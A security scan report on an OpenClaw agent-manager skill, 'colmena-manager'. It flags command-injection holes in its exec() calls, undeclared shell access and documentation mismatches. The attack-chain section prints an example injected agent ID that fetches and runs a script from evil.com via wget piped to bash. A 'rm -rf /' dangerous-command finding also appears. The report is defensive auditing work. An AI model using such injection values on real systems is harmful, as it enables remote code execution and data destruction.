Scan Report
50 /100
colmena-manager
Skill para gestionar y coordinar agentes de OpenClaw como una colmena
Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.
Use with caution
Do not deploy. Replace all exec() calls with parameterized APIs. Remove direct shell command construction. Add proper allowed-tools declarations. Audit agent.id and name inputs for shell metacharacters before use in any command context.
Attack Chain 4 steps
⬡
Escalation Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
src/index.js:12◎
Entry Victim runs 'colmena-manager health-check' to monitor the hive
src/index.js:120⬡
Escalation healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains un-sanitized shell metacharacters from step 1
src/index.js:131◉
Impact Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
src/index.js:131Findings 6 items
| Severity | Finding | Location |
|---|---|---|
| High | Command injection via agentId in multiple exec() calls RCE | src/index.js:66 |
| High | Command injection via workspace name in rm -rf RCE | src/index.js:193 |
| High | Shell execution completely absent from SKILL.md Doc Mismatch | SKILL.md:55 |
| Medium | Referenced HEARTBEAT.md does not exist Doc Mismatch | SKILL.md:64 |
| Medium | No allowed-tools declaration despite full shell/filesystem access Priv Escalation | claws.json:1 |
| Low | Hardcoded /home/nvi/ path creates dependency on specific user account Sensitive Access | src/index.js:66 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Shell | NONE | WRITE | ✗ Violation | src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.… |
| Filesystem | NONE | WRITE | ✗ Violation | src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec |
| Skill Invoke | NONE | READ | ✓ Aligned | src/index.js:13 agents_list, sessions_list, sessions_send — matches SKILL.md API… |
1 Critical 3 findings
Critical Dangerous Command 危险 Shell 命令
rm -rf / src/index.js:193 Medium External URL 外部 URL
https://clawhub.com/colmena-manager claws.json:15 Info Email 邮箱地址
[email protected] claws.json:18 File Tree
5 files · 14.1 KB · 552 lines JavaScript 1f · 289L
Markdown 2f · 211L
JSON 2f · 52L
├─
▾
src
│ └─
index.js
JavaScript
├─
claws.json
JSON
├─
package.json
JSON
├─
README.md
Markdown
└─
SKILL.md
Markdown
Dependencies 1 items
| Package | Version | Source | Known Vulns | Notes |
|---|---|---|---|---|
openclaw | >=1.0.0 | npm (peer dep) | No | Peer dependency, not bundled. No known vulnerabilities. |
Security Positives
✓ Skill implements its stated functionality (agent management) without additional hidden data exfiltration
✓ No base64-encoded payloads or obfuscated code blocks found
✓ No credential harvesting from ~/.ssh, ~/.aws, or .env files
✓ No network requests to external IPs detected
✓ No reverse shell, C2, or data theft mechanisms present
✓ No cron/scheduled task persistence mechanisms found
✓ No malicious dependencies detected; package.json has minimal legitimate dependencies